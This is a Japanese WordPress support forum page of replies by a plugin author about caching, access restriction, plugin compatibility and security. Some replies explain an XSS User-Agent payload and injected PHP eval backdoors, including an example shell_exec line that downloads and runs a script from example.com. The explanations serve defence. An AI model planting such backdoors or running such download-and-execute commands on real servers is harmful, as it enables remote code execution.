フォーラムへの返信

15件の返信を表示中 - 1 - 15件目 (全128件中)
  • 0.6.0 以前に存在していた XSS 脆弱性ですが、以下のような UserAgent でアクセスされた場合、それを管理画面で表示すると JavaScript が実行されてしまうというものです。

    User-agent: <script>alert(1);</script>

    これを修正したものが ver.0.6.0 になります。
    0.6.0 以前を利用している場合は、管理画面でログイン履歴一覧を表示しなければ害はありませんが、はやめのアップデートをお願い致します。

    StaticPress 作者です。
    現在 StaticPress には定期的に再構築する機能はありませんし、今後もその機能を実装する予定もありません。
    ただ発想としては面白いので、気が向いたら実装するかもしれません。

    StaticPress では github でもソースを公開しています。
    https://github.com/megumiteam/staticpress

    もし、そのような機能を実装されるのであれば、ぜひプルリクエストしてください。

    フォーラム: プラグイン
    返信が含まれるトピック: Nginx Helperについて

    Nginx Helper ではなく Nginx Cache Controller ( http://wordpress.org/plugins/nginx-champuru/ ) というプラグインを使用して、それのアクションフック nginxchampuru_flush_cache を使えば実現できると思います。
    詳しくは下記 URL を参考にしてください。
    http://dogmap.jp/2012/09/01/nginx-cache-controller-1-1-4/

    上の記事では purge.php をリバプロに置いてやる方法が書かれていますが、リバプロ側に ngx_cache_purage モジュールを組み込んでいるのであれば purge.php は必要ありません。
    アクションフックを登録するで書かれている nginx_flush_cache() ファンクション内で wp_remote_get() している URL を ngx_cache_purage モジュールでキャッシュをパージするための URL に変更してみてください。

    フォーラム: 使い方全般
    返信が含まれるトピック: WordPress の管理画面を IP アドレスで制限する

    上のディレクトリに置いたのであれば ip_check::is_allowed_ip() を呼び出す部分を変更します。
    以下のような感じです。

    if ( preg_match('#(/wp-admin/.*|wp-login\.php)#i', $_SERVER['REQUEST_URI']) && !preg_match('#admin-ajax\.php#i', $_SERVER['REQUEST_URI']) ) {
      require( dirname(__FILE__) . '/ip_check.php' );
      if ( !ip_check::is_allowed_ip( dirname(dirname(__FILE__)) . '/.allowed_ip' ) ) {
        header("HTTP/1.1 403 Forbidden");
        echo "403 Forbidden\n";
        die();
      }
    }
    フォーラム: マルチサイト
    返信が含まれるトピック: マルチサイトでのベーシック認証の利用

    あっ、wp-login.php にだけかけたいんですね。じゃぁ、ちゃんと .htaccess を書きなおさないとですね。

    フォーラム: マルチサイト
    返信が含まれるトピック: マルチサイトでのベーシック認証の利用

    マルチサイトで検証していないので恐縮ですが…
    拙作のプラグイン WP Basic Auth で対応できるかもです。
    http://wordpress.org/plugins/wp-basic-auth/

    このプラグインは有効にするだけで WordPress のユーザ名/パスワードでサイト全体に BASIC 認証がかかります。
    ただし、画像ファイル等の静的ファイルについては BASIC 認証がかからないので注意してください。

    フォーラム: プラグイン
    返信が含まれるトピック: 昨日から突然ツイートされなくなった

    昨日 Twitter API v.1.0 が完全に廃止され、Twitter API v.1.1 のみしか受け付けなくなっています。
    https://twitter.com/TwitterDevJP/status/344628654690664448

    Twitter API v.1.0 を使用して tweet しているプラグインは正常に動作しなくなっていると思います。
    拙作の Simple Tweet は、Twitter API V.1.1 に対応しているので動作しています。
    http://wordpress.org/plugins/simple-tweet/

    どうも、memo.dogmap.jp を書いてるものです。
    コメント欄でも指摘されていますが core.trac で追加されてることが言及されてますね。
    http://core.trac.wordpress.org/ticket/19607

    /admin/ のほか、/login/, /dashboard/ でも大丈夫です。

    フォーラム: 使い方全般
    返信が含まれるトピック: 特定のURL、固定ページのみ「theme」を切り替える

    それでは、ダメです。
    プラグインにするなら、いかのような感じになると思います。
    https://gist.github.com/4679580

    あと、この課題はすでに「解決済み」でしたね。
    本来であれば、別課題を建てていただいた方が良いと思います。

    フォーラム: 使い方全般
    返信が含まれるトピック: 特定のURL、固定ページのみ「theme」を切り替える

    switch 文を使えば簡単ですね。

    // REQUEST_URL から一番上の階層を取り出す
    $cat = preg_replace('#^/([^/]+)/?.*$#', '$1', $_SERVER['REQUEST_URI']);
    
    // abaout, news, blog によって、テーマを変更する
    $overrideTheme = false;
    switch ($cat) {
        case 'about':
    		$overrideTheme = 'twentyten';
    		break;
        case 'news':
    		$overrideTheme = 'twentyeleven';
    		break;
        case 'blog':
    		$overrideTheme = 'twentytwelve';
    		break;
    }
    
    // テーマのオーバーライド
    if ( $overrideTheme  ) {
        $overrideTheme = wp_get_theme($overrideTheme);
        if ( $overrideTheme->exists() ) {
            return $overrideTheme['Template'];
        } else {
            return $theme;
        }
    } else {
        return $theme;
    }
    フォーラム: インストール
    返信が含まれるトピック: さくらVPSでのWordPressインストール時

    手前味噌ですがセキュリティ設定に着いては、こちらもご一読ください

    VPS 借りたら、せめてこれくらいはやっとけというセキュリティ設定 | dogmap.jp

    <?eval(stripslashes(array_pop($_POST)))?>

    これは $_POST 配列の最後の値を取り出して、その文字列を PHP コードとして実行するための記述です。
    $_POST 配列には、サーバに POST メソッドで送られた値が入りますので、例えば POST で以下のような文字列が送られてきた場合、サーバで UNIX コマンドが実行されてしまいます。

    shell_exec('wget http://example.com/evil.script.sh; ./evil.script.sh');

    攻撃者は、任意の PHP コードを、HTTP の POST メソッドで送りつけて、あなたのサーバで実行させることができるため、大変危険です。

    if (isset($_REQUEST['asc'])) { eval(stripslashes($_REQUEST['asc'])); exit; }/* v0xXJf2 */

    こちらも、同様に $_REQUEST[‘asc’] という値があれば、それを PHP コードとして実行します。
    $_REQUEST には、POST, GET, COOKIE 等で送られてきたデータが入ります。
    攻撃者は POST や GET メソッドで asc という名前で PHP コードを送りつけて、あなたのサーバで実行させることができます。

    フォーラム: プラグイン
    返信が含まれるトピック: Curlのインストールのやり方について

    WordPress の質問では無いので、本来は Ubuntu フォーラム等で聞いてもらった方が良いと思いますが…

    php5-curl パッケージをインストールする必要があります。

    $ sudo apt-get install php5-curl

    その後 Apache なり、php-fpm なりを再起動してください。

    おっ、良かったです。
    問題が解決したのであれば、このスレッドを「解決済み」にしておいてください。

    Contact Form 7 の公式プラグインページ ( http://wordpress.org/extend/plugins/contact-form-7/ ) には「Requires: 3.2 or higher」とありますね。
    WordPress を 3.2 以上にバージョンアップしなければならないと思います。

    提示されたエラーメッセージ「Call to undefined function menu_page_url()」と言うのは、Contact Form 7 の中で使用されている関数 menu_page_url() が定義されていないという意味です。
    この menu_page_url() という関数は、WordPress コアソースで定義されている関数ですが、これが実装されたのは WordPress 3.0 以降だったはずです。
    少なくとも、WordPress 3.0 以上でなければ Contact Form 7 ver. 3.1.2 は、動作しないはずです。
    もし、WordPress 3.0.x, 3.1.x で動作したとしても、公式プラグインページに記述してあるように WordPress 3.2 以降で無い場合は、十分にテストしてあるとも言えないため、何か問題が発生する可能性もあります。
    公式プラグインページで提示されているように WordPress を 3.2 以降にバージョンアップすることをオススメします。

    WordPress 2.9.2 でも動作するバージョンの Contact Form 7 を使用するという選択肢も有りますが、これは、オススメできません。
    修正された Fix の中には、脆弱性に関連するものも含まれているかもしれないからです。
    特に問題がない限りは、最新版の WordPress とプラグインを使用するようにしましょう。

15件の返信を表示中 - 1 - 15件目 (全128件中)